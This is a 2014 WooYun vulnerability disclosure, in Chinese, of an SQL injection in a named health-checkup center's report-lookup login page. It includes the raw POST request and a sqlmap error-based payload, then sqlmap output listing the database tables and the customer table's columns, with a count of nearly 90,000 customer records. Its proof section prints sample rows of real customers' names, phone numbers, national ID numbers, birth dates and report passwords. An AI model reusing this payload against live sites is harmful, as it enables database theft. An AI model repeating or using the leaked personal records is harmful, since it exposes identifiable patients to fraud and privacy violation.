当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085955

漏洞标题:名流体检中心SQL注入可泄露近9W人详细信息和体检报告

相关厂商:名流国际健康体检

漏洞作者: 小饼仔

提交时间:2014-12-05 12:02

修复时间:2015-01-19 12:04

公开时间:2015-01-19 12:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

五星级服务要求,航空标准服务体系!全程专属导检陪同,科室一对一服务;舒适的体检服,人性化尿检窗口设计;营养美味自助餐,香浓现磨咖啡......时时处处彰显名流服务的每一个细节。
醉了,看完介绍我都想去体检了

详细说明:

公司名称:名流国际健康体检
链接:http://www.milord.com.cn/
介绍:名流健康·华东总部,座落于合肥市繁华大道与庐州大道交口北300米,毗邻包河区政府、原骆岗机场以及高速包河大道出口,10000余平米服务面积,设置商务体检区、贵宾体检区、VIP体检区、中医调理中心及健康管理中心。
国际领先的体检及健康管理平台,为您提供健康体检、中医诊疗、中医调理及健康管理等全方位服务,配套高尔夫球场及星级酒店,内设人性化更衣室、淋浴间、自助餐与咖啡吧等。
巨资引入核磁共振、生命热图检查仪、胶囊内镜、双能X线骨密度、运动平板心电图、平板DR、东芝生化仪、GE彩超等一系列国际尖端医疗设备,同时开展派特CT检查、基因检测、功能医学检测、中医诊疗及肿瘤专项筛查等项目。
50余位副主任医师及以上职称专家,中西医结合的方式,为您提供:健康信息采集、体检项目定制、健康体检、健康咨询、健康评估、饮食处方、运动处方、亚健康调理、慢病管理、中医养生等全方位、高品质的个性化服务。
五星级服务要求,航空标准服务体系!全程专属导检陪同,科室一对一服务;舒适的体检服,人性化尿检窗口设计;营养美味自助餐,香浓现磨咖啡......时时处处彰显名流服务的每一个细节。
报告查询处存在注入:
http://www.milord.com.cn/UserLogin.aspx

111.jpg


输入单引号报错

222.jpg


post请求

POST /UserLogin.aspx HTTP/1.1
Host: www.milord.com.cn
Proxy-Connection: keep-alive
Content-Length: 556
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.milord.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.milord.com.cn/UserLogin.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: ASP.NET_SessionId=jbcqqts5wthf1uik3ygh1a2e; IESESSION=alive; pgv_pvi=3397029888; pgv_si=s5431400448; CheckCode=VR48T; Hm_lvt_5a764bd30dc8c5db9753b87594ad3563=1415188234; Hm_lpvt_5a764bd30dc8c5db9753b87594ad3563=1415190862
RA-Ver: 2.7.1
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc
__VIEWSTATE=%2FwEPDwUJMjI5NzgwOTY2D2QWAgIBD2QWBAICDxYCHgdjb250ZW50BRLkvZPmo4DmiqXlkYrmn6Xor6JkAgMPFgIfAAVg5L2T5qOA57uT5p2f5ZCO77yM5Zyo5oql5ZGK5p%2Bl6K%2Bi5aSE6L6T5YWl6LSm5Y%2B344CB5a%2BG56CB5Y2z5Y%2Bv55yL5Yiw55S15a2Q54mI55qE5L2T5qOA5oql5ZGK44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIYnRuTG9naW6MkVB9IuRzcSTV%2F3Y1xgCQF8UMn33bnTmq0Tu45h3rRQ%3D%3D&__VIEWSTATEGENERATOR=7A1355CA&__EVENTVALIDATION=%2FwEWBALW%2B%2BWGBwKOsZ7rCwK1qeDNBAKC3IeGDJ5%2FOhyOKzWUF9eDtVtee5Bog4974UZ6uwdelsZhHlwW&txtIdentity1=aaa&txtPassword1=aa&btnLogin.x=39&btnLogin.y=13

漏洞证明:

sqlmap

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtIdentity1
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUJMjI5NzgwOTY2D2QWAgIBD2QWBAICDxYCHgdjb250ZW50BRLkvZPmo4DmiqXlkYrmn6Xor6JkAgMPFgIfAAVg5L2T5qOA57uT5p2f5ZCO77yM5Zyo5oql5ZGK5p+l6K+i5aSE6L6T5YWl6LSm5Y+344CB5a+G56CB5Y2z5Y+v55yL5Yiw55S15a2Q54mI55qE5L2T5qOA5oql5ZGK44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIYnRuTG9naW6MkVB9IuRzcSTV/3Y1xgCQF8UMn33bnTmq0Tu45h3rRQ==&__VIEWSTATEGENERATOR=7A1355CA&__EVENTVALIDATION=/wEWBALW++WGBwKOsZ7rCwK1qeDNBAKC3IeGDJ5/OhyOKzWUF9eDtVtee5Bog4974UZ6uwdelsZhHlwW&txtIdentity1=aaa' AND 9796=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9796=9796) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(106)+CHAR(99)+CHAR(113))) AND 'EQPu'='EQPu&txtPassword1=aa&btnLogin.x=39&btnLogin.y=13
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database:    'MLEIS'
Database: MLEIS
[104 tables]
+-----------------+
| TB_SN           |
| TB_TREE         |
| VTB_c关注级别           |
| VTB_c婚姻状况           |
| VTB_c性别           |
| VTB_c民族           |
| VTB_c行业类别           |
| VTB_c行政区域           |
| VTB_c销售渠道           |
| VTB_c项目增加途径           |
| VTB_f发票状态           |
| VTB_f收费标志           |
| VTB_f收费类别           |
| VTB_f结算方式           |
| VTB_s检查类型           |
| c单位体检分组               |
| c单位体检分组套餐               |
| c单位体检分组组合项               |
| c单位体检记录               |
| c单位信息               |
| c客户体检PACS原图           |
| c客户体检图片               |
| c客户体检异常结果抽取               |
| c客户体检总检结论               |
| c客户体检检查项               |
| c客户体检检查项结论明细               |
| c客户体检流程               |
| c客户体检涉及体检中心               |
| c客户体检科室小结               |
| c客户体检组合项               |
| c客户体检记录               |
| c客户体检金额               |
| c客户信息               |
| c客户取报告信息               |
| c客户复检建议               |
| f单位提成发放               |
| f单位结算               |
| f单位结算明细               |
| f发票信息               |
| f应收记录               |
| f往来单位应收账款明细               |
| f往来单位结算明细               |
| f收费发票信息               |
| f收费明细               |
| f收费记录               |
| f收费金额明细               |
| f日结记录               |
| f日结记录明细               |
| q客户排队信息               |
| q排队依赖项               |
| q排队区域               |
| q排队区域诊室信息               |
| q排队队列               |
| q排队队列区域组合               |
| s体检中心信息               |
| s体检中心诊室关系               |
| s功能点信息               |
| s历年数据对比项               |
| s参数配置信息               |
| s套餐信息               |
| s套餐组合项关联               |
| s条码分组               |
| s检查项信息               |
| s检查项公式               |
| s检查项公式关联项目               |
| s检查项结论               |
| s用户信息               |
| s用户关注科室               |
| s用户科室信息               |
| s用户角色信息               |
| s科室信息               |
| s科室接待量               |
| s科室接待量关联项目               |
| s科室诊室信息               |
| s系统日志               |
| s组合项信息               |
| s组合项复查建议模版               |
| s组合项检查项关联               |
| s结论保健知识               |
| s结论复检建议模版               |
| s角色信息               |
| s角色功能点信息               |
| s诊室IP信息             |
| s诊室组合项目关联               |
| v_lis_jbxx      |
| v_lis_jcsqd     |
| v_lis_jcxm      |
| v_lis_ksk       |
| v_lis_ysk       |
| view_abnor      |
| view_conclusion |
| view_item       |
| view_record     |
| view_客户体检记录           |
| view_客户体检记录_DELETE    |
| view_客户科室检查记录_DELETE    |
| view_用户涉及信息           |
| v体检医生               |
| v体检房间关联               |
| v体检菜谱关联               |
| v客户房间               |
| v菜谱信息               |
| v菜谱类别               |
| v诊室呼叫信息               |
+-----------------+


近9W客户信息

Database: MLEIS
+-------+---------+
| Table | Entries |
+-------+---------+
| dbo.c客户信息 | 87389   |
| dbo.c单位信息 | 2174    |
| dbo.s用户信息 | 302     |
+-------+---------+
c客户信息表字段
Database: MLEIS
Table: c客户信息
[22 columns]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| 业务代表   | nvarchar         |
| 出生日期   | datetime         |
| 固定电话   | varchar          |
| 姓名     | nvarchar         |
| 婚姻状况   | nvarchar         |
| 客户级别   | nvarchar         |
| 客户编号   | uniqueidentifier |
| 性别     | nvarchar         |
| 所在区域名称 | nvarchar         |
| 所在区域编号 | nvarchar         |
| 手机     | varchar          |
| 报告密码   | nvarchar         |
| 更新人姓名  | nvarchar         |
| 更新人编号  | varchar          |
| 更新时间   | datetime         |
| 民族     | nvarchar         |
| 照片路径   | nvarchar         |
| 联系地址   | nvarchar         |
| 行业类别   | nvarchar         |
| 身份证    | varchar          |
| 部门     | nvarchar         |
| 销售渠道   | nvarchar         |
+--------+------------------+


数据举例

手机,性别,姓名,民族,部门,身份证,照片路径,婚姻状况,客户级别,固定电话,销售渠道,联系地址,客户编号,业务代表,更新时间,行业类别,报告密码,出生日期,更新人姓名,更新人编号,所在区域名称,所在区域编号
<blank>,男,韩锦良,<blank>,退休员工,121406202411,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F77FB8D0-BBD4-4BD9-904F-E2CA18F18C84,张颖,06 20 2014 \\?a06:26PM,政府部门,<blank>,01 \\?a01 1914 12:00AM,俞成燕,yucy,安徽省合肥市肥东县,340122
13855147242,女,张群,<blank>,NULL,111311110133,NULL,已婚,普通,<blank>,其他,<blank>,F77FBF92-5CC3-4405-B842-0F0545AAF544,李想,11 11 2013 \\?a04:21PM,其他,NULL,01 \\?a01 1969 12:00AM,NULL,NULL,NULL,NULL
13909690958,男,李海,汉族,<blank>,340123197002260018,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F7802ED2-159F-4DAE-BC32-A674B7137F9A,周季,06 \\?a06 2014 \\?a03:46PM,其他,11-8C-23-A2-05-07-5C-A8,02 26 1970 12:00AM,柏玉玲,boyl,<blank>,<blank>
<blank>,男,谭经,<blank>,NULL,121403270062,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F782E45E-1D3A-4CB6-A77D-2305333F5EC1,王丽君,03 27 2014 \\?a04:56PM,政府部门,<blank>,01 \\?a01 1960 12:00AM,俞成燕,yucy,<blank>,<blank>
13505516192,女,吴松芝,<blank>,<blank>,340104196212302040,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F783C846-6EAA-49E1-825F-3548745D22BF,李想,09 10 2014 \\?a07:21AM,其他,4D-AC-DB-73-93-7F-4F-54,12 30 1962 12:00AM,陈晨,chenchen,NULL,NULL
13966322008,女,绪德莉,汉族,NULL,342601194101110223,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F78411FF-D6A0-40AB-83D9-FC359995ABD1,陈小娜,04 10 2014 \\?a02:05PM,事业单位,F4-7E-28-30-BD-17-24-2E,01 11 1941 12:00AM,白静文,baijw,<blank>,<blank>
15955163960,男,刘洋,<blank>,NULL,111312270002,NULL,未婚,普通,NULL,其他,<blank>,F785EBE2-94B5-42DA-A9A3-A1BA017347E0,NULL,12 27 2013 12:57PM,其他,NULL,01 \\?a01 1987 12:00AM,NULL,NULL,NULL,NULL
13955056370,男,张学诚,汉族,NULL,341124197310010018,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F7861AB1-12D0-428B-9906-B6A77FAF2D59,彭水秀,05 19 2014 \\?a04:32PM,其他,11-8C-23-A2-05-07-5C-A8,10 \\?a01 1973 12:00AM,李晶晶,lijj,<blank>,<blank>
18955618077,男,程玉启,汉族,<blank>,340881196902254235,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F7868B90-0D9B-4C29-9FD7-109B550EF93B,王兴龙,11 21 2014 \\?a01:05PM,政府部门,30-AB-A9-A1-85-30-44-52,02 25 1969 12:00AM,汪杨艳,wangyy,<blank>,<blank>
13003062321,男,韦俊权,汉族,NULL,340123197509242935,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F7876F9E-1231-49AD-B905-D0BF843CD9B9,周季,05 \\?a05 2014 \\?a01:05PM,其他,05-86-6E-71-AA-D0-E7-E5,05 24 1975 12:00AM,许可,xuk,<blank>,<blank>
15305515027,男,张德洲,汉族,<blank>,340322198309288815,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F787BE18-3AB9-4115-97FC-0E27CB2BA5C4,邓婷婷,09 22 2014 11:19AM,政府部门,DC-99-AB-7A-CB-6D-C1-F9,09 28 1983 12:00AM,俞成燕,yucy,<blank>,<blank>
13956013990,女,孙欣,汉族,<blank>,342401198011241024,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F7884D34-B654-446B-85A0-C2648AA66BA3,王丽君,11 12 2014 \\?a04:12PM,政府部门,8D-68-D9-E7-20-A0-E1-08,11 24 1980 12:00AM,汪杨艳,wangyy,<blank>,<blank>
13855171796,男,王鹏,<blank>,NULL,342623198501085051,NULL,已婚,普通,<blank>,其他,<blank>,F788AE93-E9E1-4106-A0F0-A4B09BC35DCC,付静,10 18 2013 \\?a01:05PM,其他,744878FBDD26871C594F57CA61733E09 (5051),01 \\?a01 1985 12:00AM,NULL,NULL,NULL,NULL
15155113468,女,李莉,<blank>,NULL,111404100501,<blank>,不详,普通,<blank>,传统渠道销售,<blank>,F788B401-77A5-4992-B51D-C88DEC685148,李芹,04 10 2014 \\?a02:31PM,其他,<blank>,01 \\?a01 1974 12:00AM,王珊珊,wangss,<blank>,<blank>
13855121063,女,丁红惠,<blank>,NULL,340123197509281707,<blank>,已婚,普通,<blank>,传统渠道销售,<blank>,F7895EF4-12EF-4066-A9C7-00414E32C9E4,周季,05 28 2014 \\?a07:32AM,政府部门,70-78-2D-A9-69-C1-06-EE,09 28 1975 12:00AM,许辉,xuh,NULL,NULL

修复方案:

~

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝